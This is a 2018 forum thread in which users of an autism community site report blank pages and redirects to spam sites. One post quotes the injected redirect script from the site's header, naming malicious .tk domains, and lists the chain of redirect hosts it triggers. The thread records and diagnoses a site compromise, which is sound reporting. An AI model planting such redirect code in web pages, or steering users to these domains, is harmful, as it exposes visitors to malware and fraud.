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29 Aug 2018, 2:35 pm

Just refreshed my browser and found I had landed on some "lucky money!! !" website.

The March hack cost me $160.56 at Best Buy Geek Squad.

Does the URL have any security connected with it?!?


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29 Aug 2018, 3:33 pm

Same. Then I cleared my cache and browser history and tried again. Same-same.
Tried from a device that I had never used for WP. Same-same again.
Waited 20 minutes, logged back in.


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29 Aug 2018, 3:38 pm

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Same. Then I cleared my cache and browser history and tried again. Same-same.
Tried from a device that I had never used for WP. Same-same again.
Waited 20 minutes, logged back in.

Mine appeared to be residing after WrongPlanet.net timed out (when did timing out get added?) because it popped up as a fully functional URL in the bar. Sooo, it appears that something lurks in the space between timing out and re-establishing connection to WrongPlanet.net.

Fnord, did yours relocate to some kind of "lucky money!! !" site?


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29 Aug 2018, 3:40 pm

AspieUtah wrote:
Fnord wrote:
Same. Then I cleared my cache and browser history and tried again. Same-same.
Tried from a device that I had never used for WP. Same-same again.
Waited 20 minutes, logged back in.

Mine appeared to be residing after WrongPlanet.net timed out (when did timing out get added?) because it popped up as a fully functional URL in the bar. Sooo, it appears that something lurks in the space between timing out and re-establishing connection to WrongPlanet.net.

Fnord, did yours relocate to some kind of "lucky money!! !" site?
Lucky Money, a travel site, and an on-line education site.


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29 Aug 2018, 3:45 pm

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AspieUtah wrote:
Fnord wrote:
Same. Then I cleared my cache and browser history and tried again. Same-same.
Tried from a device that I had never used for WP. Same-same again.
Waited 20 minutes, logged back in.

Mine appeared to be residing after WrongPlanet.net timed out (when did timing out get added?) because it popped up as a fully functional URL in the bar. Sooo, it appears that something lurks in the space between timing out and re-establishing connection to WrongPlanet.net.

Fnord, did yours relocate to some kind of "lucky money!! !" site?
Lucky Money, a travel site, and an on-line education site.

I should probably avoid this site for another six months. I don't want to pay Geek Squad for another hack that ISN'T my fault.


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29 Aug 2018, 3:46 pm

I had trouble getting on the website today. When I tried to load it from Firefox or Google Chrome, the page was completely white.
I looked to see if it was down and the side told me to run 'sudo aptitude install nscd'. I did that, and it works now.



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29 Aug 2018, 3:49 pm

Kamryn wrote:
I had trouble getting on the website today. When I tried to load it from Firefox or Google Chrome, the page was completely white.
I looked to see if it was down and the side told me to run 'sudo aptitude install nscd'. I did that, and it works now.

I don't run anything from any site if I don't understand what it is that wants launching. Risky-risky business, there.


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30 Aug 2018, 8:59 am

Well, now I am forced to launch WrongPlanet.net through the site's backdoor (finding an old notification of a subscribed topic and getting in from there). Launching from the main page doesn't work, because the main page is BLANK!

Seriously?!?


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30 Aug 2018, 9:32 am

It has been happening to me too.


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30 Aug 2018, 11:43 am

I tried to go to the front page vie the link on top of the pages earlier today, and it started redirecting me to somewhere else. I closed the tab before it could finish going there.


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30 Aug 2018, 11:54 am

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I tried to go to the front page vie the link on top of the pages earlier today, and it started redirecting me to somewhere else. I closed the tab before it could finish going there.

Good work! Because my Windows 10 system is lightening fast, I closed browser windows ASAP.

I had better not get another ransomware hack again.


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30 Aug 2018, 12:15 pm

Several months ago I came across a strange type of hack. I had opened a website from my browser (Safari) and it downloaded a strange type of hack. The hack started downloading page after page of redirects, most were porn. I immediately turned off my router and tried to investigate the hack. I ran all the tools of my virus protection software and none of these programs detected it. I eventually rebooted the computer and began again. I noticed that other browsers were not affected by the hack. The hack had changed my homepage location in the Safari browser. The only problem was that I could not change it back. As soon as I turned on Safari, my ability to do anything with that browser was disabled. In a sense it had not infected my computer but rather my browser.

The other interesting thing about the hack I encountered is it was somewhat invisible. I have Time Machine on my computer which allows me to go back in time and reload my programs to the settings from days before. I did this but the hack was still there when I entered Safari.

So with my router off, I restarted Safari and put my homepage back to its original startup location. I have been using the computer for several months now without any problem. The hack software is probably still on my computer but is no longer being activated through the homepage by my browser because there is no longer any link to it.

Whatever the hack is that I encountered may not be platform specific or even browser specific.


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30 Aug 2018, 12:25 pm

AspieUtah wrote:
Well, now I am forced to launch WrongPlanet.net through the site's backdoor (finding an old notification of a subscribed topic and getting in from there). Launching from the main page doesn't work, because the main page is BLANK!

Seriously?!?


The front page has this redirect script in the header:
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<script>window.location.replace("http://poorpeopler.tk/index/?2601510941471");window.location.href = "http://poorpeopler.tk/index/?2601510941471";</script>


The page you get sent to is full of malicious redirects:
Code:
Redirects   ✖   
(malicious) poorpeopler.tk » my.search-www.info/?utm_medium=4c23b9fecf7d... » my.search-www.info/?utm_term=65955487426596... » my.search-www.info/proc.php?37e3e265796efe1... » questionfly.com/c/5a37c8ad-f104-11e5-9f1f-... » questionfly.com/v/37df970e-ac70-11e8-bdbe-... » normour.com/r/381520e0-ac70-11e8-b158-11461... » normour.com/r/381520e0-ac70-11e8-b158-11461... » global.mobtraff.site/d/259555757b24bdd9c?su... » global.mobtraff.site/d/259555757b24bdd9c?su... » istric.com/30u13/U1ZQ/XVJA/BR4VS-6Znu-MLrr... » pnr2806.brucelead.com/ck.php?kp=kRU25GIU000... » pnr2806.brucelead.com/ck_ssl?ssl=12&li... » pnr2806.brucelead.com/ck_jump?ssl=12&l... » track.followlink3.club/?utm_medium=5e0d3412... »


Some of the other pages outside of the forum also have malicious scripts in the header:
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<script src="/cdn-cgi/apps/head/HevRZiMBtDwYp4ejiJrq1Kb4pfg.js"></script><script>window.location.replace("http://richonesda.tk/index/?2601510941471");window.location.href = "http://richonesda.tk/index/?2601510941471";</script



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30 Aug 2018, 9:26 pm

jimmy m wrote:
Several months ago I came across a strange type of hack. I had opened a website from my browser (Safari) and it downloaded a strange type of hack. The hack started downloading page after page of redirects, most were porn. I immediately turned off my router and tried to investigate the hack. I ran all the tools of my virus protection software and none of these programs detected it. I eventually rebooted the computer and began again. I noticed that other browsers were not affected by the hack. The hack had changed my homepage location in the Safari browser. The only problem was that I could not change it back. As soon as I turned on Safari, my ability to do anything with that browser was disabled. In a sense it had not infected my computer but rather my browser.

The other interesting thing about the hack I encountered is it was somewhat invisible. I have Time Machine on my computer which allows me to go back in time and reload my programs to the settings from days before. I did this but the hack was still there when I entered Safari.

So with my router off, I restarted Safari and put my homepage back to its original startup location. I have been using the computer for several months now without any problem. The hack software is probably still on my computer but is no longer being activated through the homepage by my browser because there is no longer any link to it.

Whatever the hack is that I encountered may not be platform specific or even browser specific.


I had a router infection about a year ago that no-one (my ISP and other 'experts' knew nothing about) that I googled around till I found a cure. It was most odd, and horrible in the redirection to porn sites. I did get rid of it and also had to take responsibility for it as I had opened up port forwarding on my router to play Terraria with others (or something like that. Details vague now.)

My point is theres always some new and crappy way for the vileness to get in these day. :x


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31 Aug 2018, 8:34 am

Alirat wrote:
jimmy m wrote:
Several months ago I came across a strange type of hack. I had opened a website from my browser (Safari) and it downloaded a strange type of hack. The hack started downloading page after page of redirects, most were porn. I immediately turned off my router and tried to investigate the hack. I ran all the tools of my virus protection software and none of these programs detected it. I eventually rebooted the computer and began again. I noticed that other browsers were not affected by the hack. The hack had changed my homepage location in the Safari browser. The only problem was that I could not change it back. As soon as I turned on Safari, my ability to do anything with that browser was disabled. In a sense it had not infected my computer but rather my browser.

The other interesting thing about the hack I encountered is it was somewhat invisible. I have Time Machine on my computer which allows me to go back in time and reload my programs to the settings from days before. I did this but the hack was still there when I entered Safari.

So with my router off, I restarted Safari and put my homepage back to its original startup location. I have been using the computer for several months now without any problem. The hack software is probably still on my computer but is no longer being activated through the homepage by my browser because there is no longer any link to it.

Whatever the hack is that I encountered may not be platform specific or even browser specific.

I had a router infection about a year ago that no-one (my ISP and other 'experts' knew nothing about) that I googled around till I found a cure. It was most odd, and horrible in the redirection to porn sites. I did get rid of it and also had to take responsibility for it as I had opened up port forwarding on my router to play Terraria with others (or something like that. Details vague now.)

My point is theres always some new and crappy way for the vileness to get in these day. :x

True there is always a way for hackers to hack, but why only this site and none of my others?


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31 Aug 2018, 8:49 am

And again, just now, a BLANK page causing me to use a search engine to find a workable backdoor.

Is this site falling apart?


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